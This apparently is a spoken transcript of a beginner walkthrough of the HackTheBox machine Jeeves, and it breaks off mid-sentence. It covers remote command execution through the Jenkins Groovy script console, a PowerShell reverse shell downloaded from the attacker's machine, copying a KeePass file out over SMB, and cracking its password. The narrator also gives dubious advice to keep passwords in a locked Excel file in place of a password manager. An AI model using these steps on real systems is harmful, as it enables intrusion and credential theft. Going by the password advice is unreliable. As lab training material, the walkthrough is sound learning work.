Hello everyone, this is Muted and Nuts, and today we'll be continuing our beginner-friendly Road to SCP video series. Today we'll be looking at another HackTheBox machine, that is Jeeves. Jeeves is based on Windows and the difficulty is medium, so let's just get started. Another thing is Jeeves is from the more challenging than OSCP section in the TJNR list. It is present over here, but I'm going to cover that as well because I think there are multiple good things to learn over here in this box. Okay, so first thing what I always do is we run an auto recon scan, and I do that using this autorecon.py. It's present on GitHub, it's available on GitHub, and you can get it from there. And the thing with auto recon is, if you guys don't know, it's going to do nmap scans at first, few nmap scans, and based on the output it's going to do additional scans on them. So it's going to enumerate the target machine for you once you provide the target IP address. So it's like 95% of the time it works great, but sometimes you have to manually enumerate things further, and it's that's why you don't always rely on this automated scanner, but it's always good to have it. So I just do run auto recon first, and that does not mean you do not know how to manually enumerate things as well. You should know how to run nmap scans manually, as well as another SMB enumeration, DNS enumeration, and all these things you should be knowing to do it manually. Okay, so I'll be running this as root. So since I'm running the system as Kali and not root, I'll be giving sudo over here. I'll be giving python 3 to run this file, give the target machine's IP address as 10.10.10.63 in the case of Jeeves, and I'll be giving the directory where I want to save the scan result. So I did already execute the scan, so let's just look at the scan results. So we see over here, obviously, first thing what I do is I look at the full TCP nmap scan. So let's just go and look at that, and we see we get like multiple ports open over here. We have port 80 that is open, running HTTP, and it's running Microsoft IS HTTPD 10.0 server, and we have this 135 port open, which is running MSRPC over here. And also we have port 445 running Microsoft DS, that is most probably your Samba port, SMB port. And we have your we have another port open, that is 50,000, port 50,000 over here, which is a bit different, and it's open and it's running HTTP, and the server version is like Jetty 9.4.z snapshot, something different. So obviously this looks a bit interesting, so I'll try to run a search exploit against it and quickly see if we get something over there. Jetty, and we obviously have few things over here, but I don't think it's specifically for that version because this is like 9.4 and we do not have anything over here for 9.4. Okay, so we'll just leave this aside. Probably not to skip, not always rely on source exploit. Go on Google and check out for exploits present over there, but I did not find anything, so let's just move on. So obviously we have SMB port over here, and I just wanted to show, I don't think the quick TCP nmap scan caught this 50. Okay, it did catch it. Okay, so because sometimes in the full TCP nmap scan, you get all the ports available. So this high port, obviously it caught it over here, as well as in the quick TCP. You can go check the results further down. We get few things like SMB, map, all these things. We get the host information over here, service info, we get host, that is Jeeves. Okay, and obviously there are a few other things as well. Okay, so nothing very interesting over here. We got few ports. Now how to tackle the ports? Obviously we have port 80, we have 445 SMB. So obviously let's just try and see if we get something in SMB. We'll just keep this on hold for now, port 80. So what we'll try to do is we'll just look at SMB client scan. And it says session setup failed, NT status access denied. So for some reason it says denied, and SMB map as well says denied, and you do not have authentication access. So that does not mean you're obviously going to stick to that and be like, hey, what, the scans show that there is no access. Just to be safe, try to run SMB map, okay, and give the IP address, that is 63, to see if there's guest session available. And if it still says authentication error, so that's fine, and you can run SMB client as well, but you do not have guest session enabled over here in SMB in this particular machine, so let's just skip it for now. My point is, like, don't always rely on what is seen over here, because I think in the previous video we have seen that SMB map showed some authentication error, but SMB client showed results and shares over there. So just try to manually enumerate and check things once, otherwise you'll miss out something crucial and it will be a big mess. Okay, so let's move on. We have port 445. We can check the same for 135, I guess, and also there is like a commands log, I guess, which you can check, which says like what all commands you can manually No, what all commands it did run. Okay, manual commands. Okay, so this is what it says. It suggests you to add, use a RPC client, use this and try to run and see if you get something. Let's just try that as well. I don't think it's gonna work, but let's just see. It asks for password. Obviously, you do not know anything. Just hit enter. It says connection disconnected. So obviously, you do not have anything over here. So let's just close this thing and let's just move on. So okay, close this. Okay, so now we have port 80 over here, which is running HTTP. So let's just go and look at that. So enter the IP at 10.10.10.63 over here, and we come across something which says ask Jeeves. Okay, ask Jeeves. So probably something like search bar, I don't know. And there is like, you can probably click on these things, and if you click on web, images, news, lots of answers, there's nothing over here. It's just like a hyperlink which leads to nothing. So obviously you can do view page source and see over here. It's just, that's it, nothing else. There's no proper link over here, so it's just gonna have that hyperlink effect, that that arrow which is coming. Okay, so we have search over here, and if we enter something in search and we submit, so it's gonna go to probably this error HTML. So let's just try that though. Always good to check the page source, okay, and especially there are like custom applications, web applications, so always it's good to check out the source page over here and see if you get something interesting. So let's just do test search, and we come across this error HTML, what was mentioned over here itself. So obviously on submit, it's going to do this error HTML on action. Okay, so we come across this page which looks like an error, but it does not. It's an image file. So if you can see, I just do this randomly, obviously because it's not clear as well. I don't know in the video if it would be very this, but it is somewhat blurry. It's not like actual text. So obviously this was like, I got to know, see if you see view image, if you do view page source, we just get this Jeeves PNG image. So this is that whole image about. Okay, so obviously I thought, like, obviously first time when I read the box, I was like, okay, maybe there's something interesting over here, the SQL server, some exploit related to SQL server, something would be present to get some information over here, but I could not find anything. It's just a random image. So what I did was, obviously we do run a GoBuster scan, and I think it did run GoBuster over here. Let me just check. Yeah, so the GoBuster scan did run on from the auto recon tool. Sometimes it does not run by itself. Okay, so we'll look into it, how we'll do it. But yeah, so this is what we got: index HTML and error HTML. So index HTML is obviously the default page which we came across, right? That ask Jeeves. So it's the same thing. So obviously just leave it as it is. So what we would do is we would run since this GoBuster scan over here, which runs with auto recon, there's the list what it's using. Okay, the word list. It's considerably small, I guess, and I don't think you would get everything over there. So let's just try to run GoBuster with the small txt. So small txt is my new favorite, and I'm using that like for almost all the boxes now. And I start with small txt itself. I don't even touch common txt now, but sometimes I do. But yeah, usually a small txt has like around 80,000 words. Common txt has like around 4,000 only. Most of the things are present in small txt, and there's medium txt as well, which is like 2 lakhs plus, but it takes a lot of time to scan that. So we'll be running GoBuster, but before that we need to locate the small txt. It's already present in your Kali machine, I guess. You don't need to additionally get and download it, just to locate small txt, and this is the one which you are looking for, not this one. Please don't get confused. So this is the one which you are looking for. Copied it. So we'll be running GoBuster now over here. So GoBuster, and GoBuster, I don't think by default it's available in Kali, so you can go on GitHub and get it. And we'll be running GoBuster. We'll be giving dir, that is the directory mode scanning. We'll be giving u, that is HTTP, and the URL, that is 10.10.63. And also we'll be giving the word list, the one which we copied, small txt, and we'll be giving the extension switches. So now since this box is like a Windows box, right, so probably you can enter like BAT files and like batch files, and also you can just check view page source. Sorry, my bad. You can just do inspect element, go to network, and try to reload this page. And let's see what do we get. Obviously we have like IIS server, so most likely it will be like, I'm just guessing, it can be PHP, ASPX as well, but since it's a Windows box, you can add ASP over there, ASPX. Okay, so let's just add that as well, ASPX and ASP and PHP. Don't forget to add PHP as well, and HTML, TXT file, PL, PY. You can give PY files as well. So just add these things and try to output it. Probably give the O switch for output. You can mention like GoBuster, AT port, and SMA extension, TXT. So you can give something like that, because you need to understand, like, obviously when you're doing the box, there'll be a lot of things flowing here and there. If you just enter GoBuster, okay, this is just a small thing, obviously it's, personal choice. If you just enter GoBuster scan, you would not know what scan it is firstly, if it is port 80 or port 50,000, or it is a common txt or it is a small txt, that way. So it may get confusing, so keep it neat that way. So that's why I probably enter like 80 com extension and txt that way. So just hit enter and the scan will start. You can even give threads to get the scan fast. So that is, you can give 40 threads or 100 probably. Sometimes I give 100, but sometimes I get some errors from the client, like from the server, that too many requests, something like that. So that's why I give 40 at times or 100, depends. So if you just run it, obviously it's going to run the scan. It's going to take some time. Obviously we got an index HTML as well. So I did already execute the scan, so I'm not going to do it again because it's going to take quite some time. And we'll look at the small txt scan over here. It's like the same result what we got in the common txt, okay? So we did not find anything interesting over here. What we'll do now is just hold on for some time, and obviously you can keep the scan running over here and check out for other things which is present in the box. That is the port 50,000 over here. It says Jetty, something like that. So two things. Obviously it is HTTP over here, does not mean that it is some web application itself. You can probably try to log in using telnet over here. So let's just try that telnet 10.10.10.1, sorry, 63 50,000. Do that, get something. Well, let's just try help, because most applications will have the help command. So it's just, I did not even hit enter. So it just said connection closed by foreign host. So probably it's not likely to connect through telnet or NC. So let's just try it in the web browser and see if you get something interesting. And 63, give the port 5000 over here, and we get some HTTP error saying problem accessing something, reason this, and there's a link. Let's just copy link location and let's just paste the link. It's obviously belongs to some external site. Now one more thing over here, I know obviously most of you guys may be aware, but if I click this, you guys may be wondering that, hey, you know what, this website also belongs to the target machine and something like, no, because the domain is different over here. So please do not try brute forcing, or not brute force exactly, but try to enumerate things or throw exploits over here, because this is a different domain altogether. So please don't do that. I know most of you guys may be aware, but just saying. So we had this thing over here and powered by Jetty, but we do not get anything. Let's see, view page source. Do not get anything either. It's just the text what we saw earlier, right, in this page. So what we'll do is, next thing, obviously we'll check the GoBuster scan. AutoRecon did scan it for us over here, but it's blank. We did not find anything over here in the the word list, which is small. Not the small, sorry, the common item. It's like very tiny, just consider very small word list, okay? So it did not run anything over there. So what I did was obviously run GoBuster against it. So we'll run GoBuster against that, and we'll be giving the port over here, that is 50,000. Don't forget, it's not 5,000, 50,000. Let's small txt, and we can mention 50,000 over here. Okay, my bad. I'm so sorry that I had added com over here. I usually add SMA, so for small, so my bad on that. So just enter this. You can enter anything, obviously it's your choice, personal choice. You can enter big this, like small with extensions and all these things, but I just keep it simple as that. Okay, so we have 50,000. We'll run this scan and we'll see if we get something. Obviously I'm not going to run it, but because I'm not going to wait for the entire thing, because it may take quite some time. So I did already execute the scan, so let's just look into the scan results first. And we see we have something like ask Jeeves. Okay, so let's just try and see what it is about, if we get something. So I just pasted over here after 50,000. It's taking some time to load, but let's see what it is. So we have something known as Jenkins over here, okay? So you do not need to know exactly what this application is about or something. What we need is because see Jenkins, obviously Jenkins is more common than other applications, right? Web applications. But if you guys are not aware, that's fine. But Jenkins is mostly used with GitHub and everything. Okay, so the thing is, to create few jobs or anything like that. So if you do not know anything as well, that's fine because there are multiple web applications I came across. I did not know about them. So my main focus is what our main focus over here should be. You get that application name, you get the version number of it because this application does not look like a custom. Always like I'm saying it in the previous videos as well, you have two things. One is the open source web applications or the vendor related web application which is created by somebody. Okay, so the vendor creates. Now if vendor creates a Jenkins app, okay, they will have a version history which will be common like across the globe or planet, something like that. So if you have a custom web application, some user from maybe HackTheBox or somebody has created just for the target machine, so obviously that would not be online, right? The vulnerabilities or something until he has published it. So this was only created for the box or something. So obviously this looks like vendor application. We have Jenkins version 2.87 over here. Quickly, what we can do is we can do a search exploit against Jenkins. We can put 2.8 just to see if we get something, and we do not get anything. We say something like Groovy plugin script security Groovy 2.6.1.1. Okay, my bad. I think it was 2.87, right? So we do that, we do not get anything, but we get something like below version 2.61, I guess. You can run this. So obviously, first thing it would be like, sorry, this thing would not work probably because the version over here is a mismatch. Okay, so let's just hold that for now. And what we can do is we can just check Jenkins 2.87 exploit. We come across multiple pages over here. Let's just look into it one by one. Okay, so I don't want to go over here firstly because in this recent pages over here which says December 28, 2018, because I think the box over here was released like long back, I think 3 years back. So probably it should be like around 2017, I guess it was released. So I do not want to go over here because this would probably be like a hint for the box. So just because I avoid myself, like when I do it in the first place, to go into hints because that would ruin the whole experience. So there's some old article over here from 2015, so probably just look at that. Just my thing, obviously you can go and check, nobody's stopping you, but that would like break this, right? So probably you can check for any latest version, but I generally prefer the box when it was released. Before that any articles are there that way. Okay, so we have something like High End Coffee over here, and it says it was tested on versions like 1.638. Okay, so obviously we do not match the version over here, that is 287. And we can check out for more pages over here. You can check out for this as well, but this is again 2019. So we come across this another page over here which is like from 2015. Okay, so obviously I don't think there's some specific version number given over here. And so the thing is, sometimes the version number is not given as well, but that exploit would probably work. So it's like, might as well give it a go, right? So this script, and if you check out this script, it's like similar, and I think it's exactly the same except for this wget command. So it's like a similar script. What we can do is we'll just copy this, okay? But first thing, what it's saying is, okay, it came across some instance, okay? This is like a POC, and it says this feature over here, Jenkins script, got my attention. That is somewhere like this language is different. Okay, if I'll just try to zoom in, it says configura Jenkins and something. So obviously I am not sure what language that is, but you have to go and configure Jenkins, and I have managed Jenkins over here, but I think it's similar to that because here there is like a sprocket and here there are like tool set is present over here. So let's just try that. Obviously just see, obviously I would go to another things as well, and we see something similar over here what we got over here, right? Configure something like that. So it looks something similar, and it says you go to the script got my attention. Okay, so obviously let's just see if there's something script. It says script console is present over here. So once I go to the script console, obviously here also it mentions console script. over here. So we have this thing present. Type in an arbitrary groovy script and execute on the server. So probably we can add some script present over here. It's the same thing, right? Exactly the same thing. So this is the command over here. Let's just get back to normal view. Let's just copy this and see. Obviously don't just copy paste, maybe you have to try to understand, but that is the part of his POC, right? He's executing the command. Okay, in short is creating a command variable, I guess, defining that, and that is who am I. Then over here it's executing it, command execute, and it's like process proc wait for it. This is the variable which has come over here, and in the end it's giving some return code. Probably if it error out or something, it will give us some return code, or there will be like a std out code or something. We'll just see if we get something. Obviously over here the user got something, so let's just see. Just zooming in a bit, it got something like code 0, so I don't think he got any errors over there. So let's just try that as well, and let's just copy this, paste this. And now since who am I is a command which we like to run, and in the earlier videos I guess there was one box where who am I was present but it did not give us any output, so probably we had to enter something like cmdc and who am I. So let's just try with who am I first and see if it works or no. Okay, so let's just do run, and it says over here std out, that is a print, obviously the echo which we are going to do. So that's the std out which we are getting, and it actually says Jeeves costs okay or something. So obviously if you want to confirm that the REC is actually coming from the server, you can even enter host name over here and run it, and it says Jeeves over here. Okay, another thing you want, you can enter probably like IP config. It's IP config for Windows, not IF config. So obviously we got that as well, and we got the target machine's IP address, that is this. So that means we have remote command execution. If we did not have echo result over here, we could add the ping command like I have done in my previous videos as well. Give the ping over here, start TCP dump over here, and see if the ping reaches your attack machine or not. Since we have remote command execution, we can try and copy a file or try to execute a file reverse shell from our target machine directly. From our attack machine directly using SMB share. Or what we can do is we can just check if we can execute PowerShell commands, that is PowerShell C, and you can do who am I probably and see if it works. It does work. Okay, so what we'll try to do is in Windows boxes there is a thing which we can do, that is Nishang PowerShells. Okay, PowerShell Nishang. And this is the one which I'm speaking about, and the file which you need is the go to shells and check out the PowerShell TCP PS1. So this is the file which we need, and just copy this file and create a file, or just use git clone on the terminal and get the file downloaded. Okay, so I do already have that file in my system. So what we'll try to do is let's just open it first. If you just run it as it is, you're not going to get a reverse shell. So what you have to do is this example over here, just copy paste the IP with IPv4, not the IPv6. Obviously, even if you copy that, it's the same thing. I guess you can just change the IP later. So copy it in the end. Why I'm doing this is because this whole invoke PowerShell TCP is a function. So when you call it in the attack machine, in the target machine, when you call it, so that means that time this function will read and it will be loaded over there. Okay, so it will be loaded in the memory. In order to call this function, then I'm creating a function. Okay, so in order to call this function, I have to actually add this function over here. Okay, so just I hope you guys may be knowing about this. So if you consider here as well, here probably there'll be something called as an execute function would already be present. Okay, so since we are calling that execute function, it's gonna run for some reason. Just consider this as an example. I don't know what's there in the backend, but yeah. So println, there'll be a function written, right? Whatever present over here, print it. But we are calling that. By itself, it's not going to run. So once we call it, then only it's going to run. So that's why you have to enter it in the end so that it runs that function. Okay, if this whole function consisted of only one thing, that is 1 plus 1, that is obviously 2. So if we just write 1 plus 1 is 2, and we do not call this function, okay, we just do not add this thing at all, if we run it, it's not going to give us any output. But if we call that function in the end, that invoke PowerShell TCP, which is 1 plus 1 is equal to 2. So this thing will straight away go to the first line and be like, hey, you know what, it's time to run, so let's just run. So it'll be like, hey, okay, let me calculate, 1 plus 1 is 2, okay, and then it will print, and probably just enter print, and then it will print the value. Just small this, obviously most of you guys may be aware what it's doing, but since it's beginner friendly, I want you guys to be clear that how it actually works, okay, and there should not be any confusion. If people are programming, obviously they know what I'm talking about. Okay, so 10.10 and 14.28, this is my attack machine's IP address. Okay, so port, let it be 444 itself. We can change it to any other port, so let's just leave it as 4444. There's no hard and fast rule, you have to use this only. We have this machine present, so sorry, you have this attack machine's IP present over here. What we'll try to do is two things. Let's just go to exploit directory now, because we are in our workplace directory, right? So you can use pwd as well to know the location where you are. So we are in the workplace directory. Let's go to exploit directory now. So exploit. Okay, so we have that file, my bad. So we have this invoke PowerShell PS1 file, right? So I don't know why it has so many permissions, but probably you can just enter C744. 7 is read, write, execute. 4 is only read, read. So let's just do that. Please, this should work, I guess. Okay. So we have this file over here. What we'll try to do is two things. One thing is you can create a Python HTTP server. So let's just do that over here. Python 3m HTTP server. You just hit enter, or you can give a port number that is 8801 or 8000. I usually give 8000, so I just hit enter over here. It's by default 8000. Ignore these zeros because it's saying it's hosting on localhost. So next thing is set up a netcat listener and see. If you guys don't know what netcat is, it's like a connection tool from the target machine to the attack machine. You can have a connection present. You can send files using netcat. It's very useful because few Linux boxes I did not have wget in the system, so I had to transfer file using netcat, or there's SCP as well. Multiple ways to transfer file, but netcat is the second thing what I use after wget. So we have netcat over here, and especially files from the target machine to the attack machine. So I use netcat itself. You can use SCP as well, but yeah, you need to have SSH credential for that. Okay, let's not go over there, but yeah, we have NC, and we'll be giving the N switch for numeric only, V for more verbose output, and L over here for listening mode, because we'll be listening for the target machine to come and contact us. We'll be given the port 444, so that was the P switch over there, so that's how we enter it. Press enter, it says listening any on some so and so. Next thing what we do is, we have this invoke PowerShell TCP file, copy this PS1 file, go over here, we have given PowerShell.c, PowerShell commands are working, so we'll be giving IEX, that is the invoke expression command from Windows. I have not created this command, it's present in order to call a script and load it in the memory. So I'm calling that invoke PowerShell TCP script. Okay, so that's how I'll be using IEX, creating new object and net web client. See, I know these commands may be tedious. Sometimes I remember this command, but then there are some commands which I don't remember myself. So I have a cheat sheet with me, and I obviously copy all the new commands which I come across. Sometimes I Google for few commands, right? So I come across some command, I use it on my Excel sheet. I have it present. You can use any sheet you all want, but you all save that commands, okay? So later on you don't have to further go and check out and research more, like waste 5-10 minutes in that command. So this is what I follow, and you guys can follow as well if you all want. So we'll be entering net web client, download string, HTTP, and 10.14.28, and the port number, that is 8000. So this is my attack machine's IP address where this Python server is working. Ignore this 00 because I'm running on localhost, but obviously my IP address in the network in the HackTheBox VPN connection is 10.10.14.28. Okay, so 8000 is the port where I'm running, and also I'll give the file now, that is invoke PowerShell TCP PS1. Okay, so give that code, close it. Why quote over here? Well, obviously over here it should close it as well, otherwise it would error out. It looks good, I think. Download string. So this is the command for Microsoft Windows as well, the PowerShell command. I have not created myself, and just entering this file over here, ps1. Let's just run it and see if we get something over here. So let's just run, see over here if we get something. We get a get command over here, and we get something over here as well. So obviously if we do who am I, so we are over here, sorry, as seen earlier as Kosuke, and if we do dir over here, we have a lot of things present over here. Another interesting thing is we are inside the administrator directory, but that's where the fun ends. Obviously it's just like I thought, oh, maybe we have administrator drive access, so we can probably change the desktop access or something like that. But yeah, that was not the part, because if you go back, so we'll be having permission denied or something. So we have jobs over here, we have multiple things. First thing, obviously, since I landed up, when I did the box for the first time, I landed up over here. I tried to enumerate things over here. We had like multiple things as secret key, like multiple XML files. There was some admin files as well, which had some few hashes or passwords, I guess. So I tried to collect all those information and try to see if it works, like, the passwords work or no. But I was not successful over this. I did not get anything over here, so I just gave up. I was like, okay, let's not waste much time over here. Go back to something else. Probably this is not the mentor to go for. So when I come in the box first time, obviously we can check out for basic things like system info. It's like almost like uname, but it gives a lot of information, and it's obviously good. So we have uname over here. It says, we have system info over here that says Microsoft Windows 10 Pro. Obviously latest versions, and we have multiple hot fixes over here as well. So obviously kernel exploit, I myself don't like kernel exploits because you do not get to learn anything, no privilege, just run an exploit, you get system access. But yeah, we have these things over here. It says original install date is around October 10th, 25th October 2017, and that's it. So we do not get, and yeah, that's it, I guess. Jeeves, and we obviously see it's x64 system, that is your 64-bit system over here, the OS. So what we can do is we can just go back, and if we do dir now, it will say permission denied. So that's what we had, only access to this Jenkins directory for some reason, because probably it was mentioned under admin, I'm not sure, but yeah. So we come back, we go over here, we have Kosuke over here. Let's just go to Kosuke, do dir, we go to desktop, we do dir again. We have the user txt flag over here. We can very well read it as well. So we got the flag. Now obviously trying for prives, we can run multiple exploit, like multiple things over here. That is your, you can check. I actually follow this fuzzy security list. I'm not sure where it is. Let's just check. Fuzzy security. Yeah, Windows privilege escalation. I follow this, like, I try to get information for all the users and see if I get something, useful. But for privilege escalation in this box, there are two ways you can do it. One is like slightly easy way. One is not very hard, but yeah, it's a bit tricky and little bit CTF. So we'll see that CTF thing later, but yeah, let's just look into that now. So if we do who am I, and if you do all, I don't know, it gave us some error over here, but yeah, we got the group name over here, we got the username, we got the SID as well, and we have the privileges information. So obviously if you see over here, we have SeImpersonatePrivilege present over here, which is like impersonate a client after authentication, and we had seen in the earlier box as well, I think it was bashed. So over there we did this using juicy potato. So that exploit worked over there. So we can probably try that over here as well. But that was not the intended path, I guess, for this box. But there's another path which we can see. And I tried enumerating multiple things and directories. Usually I check for desktop first. If I find anything interesting, then I go back to the user, check for other directories like documents, dir. We have something like chkdbx. Okay. Another thing is, it's not that I do not have a tunnel vision. I do not know where the exploit is present. I'm just saying it because sometimes you guys may be like, oh, how these people on YouTube, they are like, oh, they found this over here immediately in 1 minute they saw it, something interesting. It's not that way. I'm sure most of you guys may be aware, but it takes time as well to find things over here. It's not that first time, and people get stuck as well. So yeah, so we have the chkdbx file over here, which we can try to get it into our target machine, sorry, into our attack machine, because we have some file over here. If you look at the last, because it's not a default file, right? So obviously in desktop or maybe some other directory, there would be some default files which are present, like some txt file or something like that, which is present by default, or the lnk file, right, the shortcut files. So that means it is there by default. Okay, so that there's nothing much interesting over there. But over here it says we saw the yeah, so in short, it says over here the last write time over here was 2017, and I think it was in September 18 over here. So what we'll try to do is we'll just try to take this chkdbx file and see if we get something interesting over there. So before that, we'll try to start a SMB server, because it's easier to copy. Windows SMB is your friend, Impacket SMB. So an Impackage tool is your friend. I'm just saying it again. But yeah, let's just create a folder over here just to keep it neat, SMB, and just open it, open terminal over here, create a SMB Impackage server, but you require sudo for that if you are running the box as Kali. If you are running as root, that's fine, but you need to run it as root. So Impacket SMB server, and we'll be given the port, that is, sorry, not port, but the share name, that is, you can write shared over here, or probably I'll just mention muted nuts, and the current working directory, that is this thing. So you can paste it from here, or you can do pwd and get it. So just hit enter your Kali password, and yeah, it started. So it shows this thing, and it has started over here in packet. Okay, next thing is you can just copy the file to the shared drive, or you can allocate that shared drive to a drive over here using Z or something. But in one box I had an issue, I could not locate that drive, so I was using it manually. I just tried to transfer it always, and that worked for me. So I don't really, it does not matter if I locate a drive to like probably a Z drive or something. I just use it manually. I'll just show you all what I mean. If you can use net use, and you can use this external SMB drive, and you can allocate a drive from over. Now we are in C, right? We can allocate a drive like Z, and instead of copying it to this SMB directory over here, I'll just show you. I'll just copy chkdbx, so paste it. So first is the file which you want to copy, the location of the file where you want to copy. Since we are already in this directory, we do not need to add the entire path over here. You can add that, but you do not require to enter it. So enter the network name, sorry, IP address and name, that is muted nuts, and probably save it as the same name itself. So instead of doing this entire thing, you can use net use and put a Z drive over there, and you can just use Z and colon and / and this file. That's it. So it will be saved over here. Yeah, so I do it this way. Either way you can do it. Just letting you all know, it's not hard and fast rule to do it this way itself. Okay, so let's just hit enter. Takes time. Obviously you could use type, I guess, over here and see if this file runs, but I don't think you'll get some. Yeah, obviously you're getting some non-readable characters. So we have the chkdbx file over here in the SMB directory. What we can do is, we obviously require this thing, SMB packet. We will require it maybe later. So what we'll do is just check file. So file is a tool in Linux, so you can check out for information about any files which you got from the target machine, because you'll get to know what kind of contents it has. Probably it will try to guess, and based on multiple things, and what kind of a file it is. So earlier in the previous videos as well, we have used it, so we'll use it over here as well. So chkdbx, sorry, it says keypass password database. So I hope you guys know what keypass is. So keypass is like a password credential manager. If you don't know, that's fine, but I already knew what keypass was, because yeah, there are multiple people who use keypass. Okay, and I think recently there was some vulnerability from keypass, and most of the organizations stopped using keypass because there was some vulnerability, I guess, or something. But so I thought that was the case, but obviously this was like a very like old box, like 2017. So it says something like keypass database. So what this means is, so keypass, if you guys don't know, you can just go on Google and check for it. It's like a place or like a storage which is going to store your credentials. Okay, so if you work like, if you are working, you have like, suppose for over here, just consider as a normal human, you have like multiple IDs, right? You're having hack the box account, obviously, if you are exploiting hack the box boxes, and also you'll be having like a Gmail account probably, and you'll be having like some other Facebook or some account, YouTube account or something. So obviously you'll be having credentials and you'll be having like different passwords for them, right? So that's a good practice to have different password, not the same. So if you have different passwords, so it's sometimes hard to maintain those passwords, right? You may forget passwords or something. So KeyPass was an actual day, like, software where you can save all these passwords. Like, hey, my YouTube password is this is YouTube password. Okay, my Gmail password is, hey, this is Gmail password, and so on. You could save it and lock it with an password or something. So in order, if somebody else opens the KeyPass, they have to enter some password in short, and they could get access to this KeyPass passwords over there. Okay, so that's how it worked. And if you guys want, you all can check it on Google more, but that's how it worked. And another thing is, please do not use any software as such. If you all want to save, just a small tip from my end, if you all want to save password in a file because you all may forget it, save it in a Microsoft Excel and encrypt it with the password. So you can just log the file with the password over there and you can save it. Just best practice, just want to tell it to you all so that you all don't fall prey to all these things. Okay, so it's not a bad thing to use, but it adds some vulnerabilities. So yeah, let's move on. We have keypass database password over here, and so what we'll try to do is we can just check out that how do you open this particular file, because probably it may be encrypted. If you do cat ch kdbx, obviously there's like a lot of non-readable characters, right? So let's just Google and check how to open kdbx file. And obviously after a lot of you have to go and check out what is kdbx file and what it is, so you come to know that, okay, so in short, if you want to open this kdbx file, you have to have a password along with it in order to read it. Okay, you need to have a password over here. So before that you cannot enter it, you cannot open it, my bad. So what we try to do is we'll just try to see, okay, like file ch kdbx, okay, keypass password database. So how to, so first when I thought, like, obviously there's a keypass database file present, right? So that may be encrypted with something, because when we open the keypass app, so obviously we need to enter some password, then that entire data would get decrypted, right? So that's why I mentioned like how to decrypt a kdbx file, and we see that we get something over here, how to hack keypass passwords using hashcat. This is like from May 2017, so which is likely to be, before the box was released. Okay, so obviously, and this is just a generic thing like how do you crack it. So if you go across these things over here, it says that you need John the Ripper, that is probably John, which we use for multiple hash cracking and everything, and also a tool called KeyPass to John. Okay, so you can get that as well over here. I guess there's a link, but I think it's present in a Kali machine. So what we'll try to do is we'll locate that KeyPass to John first. So we'll do locate and KeyPass to John. If we see if we have it, we do have it on our Kali machine, so probably we'll just use it. I think it's present by default. If it's not present, you can go and search on Google how to install it and use it. So we'll be using KeyPass to John, and as you saw the usage over here, it mentioned that enter the KDBX file first and then output. So we'll probably do that. We'll have ch kdbx file and output, that is ch, and probably mention hash. and we have the file. So we'll probably enter ch and hash over here. My bad. So hash. So we get the hash over here, and it's like it's like an encrypted data most likely. So what we can do is we can just check out for hashcat examples, and well, let's do that. Hashcat, and just check out keypass. So over here, if we see, we are keypass 2, right? Because it's 2 6000. So this is what we are looking for, keypass 2, and it's like not like an hash, but it's like AES encrypted data probably. Okay, but it's in keypass format. So let's just leave it as it is. What we can do is we can run John over here as mentioned in this particular file. That is keypass 2. Okay, this is done. So they are mentioning over here to run it as hashcat. We can run it as John as well. So let's just run it as John. And if you guys don't know John the Ripper, you can have a encrypted data passed on, like we have seen earlier, I guess, in some SSH file. We have given encrypted SSH file. We could decrypt it and get a pass. I'm not sure it was done. I think it's done in one of the HackTheBox boxes, but I'm not sure it was in the video. But we can decrypt encrypted data if we give a password word list, right? So first we require that. So let's just locate our rockq.txt file. That's the password word list. It's present in Kali machine by default, I guess. If not, you can go on Google and download it. And so we require that. We require sudo John, and also we'll be giving the file name, that is this encrypted data, which is like, just consider it as an hash now. Okay, leave it. Don't consider it as an hash because it may get confusing. It's an encrypted data probably, So we have this encrypted data, which is like a lock, and we require the key now. So key is probably the password. So sudo John, and we enter ch and hash. Just enter hash over here. Yeah, just ignore it. Probably just should have just entered ch and something. But yeah, ch hash, and give the word list over here. That is this rockq.txt. So let's just hit enter and see if we get something. And it says loaded one password hash, no password loaded. But actually, first time when you run it, it is like a different password over here. Okay, so the password is actually, it displays up over here, but the thing is I did already execute and run the file, so that's why. So you have to just clear this word list over here and just enter show. It will show you the password. That is moonshine1. Okay, ignore this ch. This is the password which you are looking for. So let's just copy that. Okay, so probably we'll use it later, so we can copy it in our cherry tree as well. And what we can do is we'll just check out the ch file. In order to run hashcat over here, just remove this ch content over here. Probably just create another file which is not confusing. Just name it ch. That's it. Don't do anything else. Ch, and remove this content over here in order to run it with hashcat. As we saw now, the mode of hashcat over here is this. Now the thing is, why you need to know both of the things and why you need to know hashcat. When you know John and John, by default it checks this thing and it analyzes, and it's like, hey, I'm gonna do it for you, I'm gonna know the format and I'm gonna execute it. Why use this? Why? Because actually I prefer doing it both the ways. You should not doing it both the ways. First, why? Because I actually faced an issue with one hash that John could not crack, but I could get the format from this table and use hashcat, and I could crack it that way. So John by default, without giving any format or something, it could not crack it. So same with rockq.txt I had given, but it was not able to do it. So that's why you should know both, because if you get stuck up with one, you can use the other one. So we have keypass over 13400. Sorry, we'll be using hashcat. In order to use hashcat, you can give hashcat. You do not require sudo for that. Giving in the mode, that is mswitch, and 13400 will be giving A for dictionary attack, since we are just going to straight dictionary attack. So we'll give the mode as 0, and we'll be giving the file name, that is ch, probably just ch, yeah, and the word list, that is this rockq.txt. Let's just hit enter, and it says okay, you have to do force. Okay, so obviously I did execute using hashcat as well, so let's just use show. That's it. Okay, so we see over here we get the password. Obviously, if you're doing it for the first time, you'll get some different output, and it will run the scan for some time, and it will show you something similar to this. but it will show additional details over here as well. So we have Moonshine over here. Just copy this, and now we have the lock, that is this, the encrypted data, and we have the key. Now we require a medium, right, in order to actually put that lock, open that lock using this key. So we require keypass basically, but I did not go that keypass route because, as in, I did not install keypass on my system because it was not present by default, I guess. So if you just do keypass, it's not present over here. So what I did was I just checked for an online viewer because I did not want to install it just to do this box. So keypass online, keypass online. Yeah, just do that, and we get something like key web over here. So online web app. Another thing is, please do not save passwords in that, or actually online or something like that. Okay. So this is just obviously for the box, so you can probably use it. But yeah. So we have ch hash and ch. We do not have to use that because those are like the encrypted files. We have to use this, that is a lock. If we say we get some error, not error, but some message over here, just do OK. And it says password for ch. So obviously the password is Moonshine for the lock. So just enter that Moonshine1. Okay, I think okay, so Moonshine1, we come across this. It says like Bank of America, DC recovery password, multiple password. If you click on it, it will actually display. My bad. And there are multiple passwords over here, but EC Council, there's some password over here. It's a secret. Obviously, you have multiple passwords, Jenkins admin and everything. So what we can try to do is we can take these passwords and use it one by one in SMB map. And why SMB map? Because obviously if there is some genuine credentials for administrator, so probably you can log in using SMB map, like in SMB, rather than creating that invoke expression, create user, create plain text, and then the password, and then check over there. So this is much better way to check it using 